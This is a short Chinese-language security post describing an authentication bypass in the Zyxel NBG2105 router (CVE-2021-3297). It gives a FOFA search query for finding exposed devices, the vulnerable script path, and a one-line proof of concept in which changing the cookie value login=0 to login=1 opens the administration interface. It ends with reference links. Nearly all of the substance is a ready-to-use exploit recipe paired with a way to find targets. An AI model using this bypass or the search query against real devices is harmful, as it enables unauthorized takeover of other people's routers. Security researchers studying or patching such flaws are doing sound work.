Zyxel NBG2105 身份验证绕过(CVE-2021-3297)

# Zyxel NBG2105 身份验证绕过(CVE-2021-3297)

**FOFA:**

“`
app=”ZyXEL-NBG2105″
“`

**漏洞代码:**

“`
http://target/js/util_gw.js
“`

![](/static/lingjiao/images/16116664946838.jpg)

**PoC:**

“`
Cookie: login=1;
只需要将cookie中login=0 修改为login=1即可直接进入管理界面。
“`

![](/static/lingjiao/images/16116665275577.jpg)

![-w595](/static/lingjiao/images/16116665373943.jpg)

ref:

* https://forum.ywhack.com/thread-115035-1-1.html
* https://github.com/nieldk/vulnerabilities/blob/main/zyxel%20nbg2105/Admin%20bypass

© 版权声明
THE END
喜欢就支持一下吧
点赞0赞赏 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容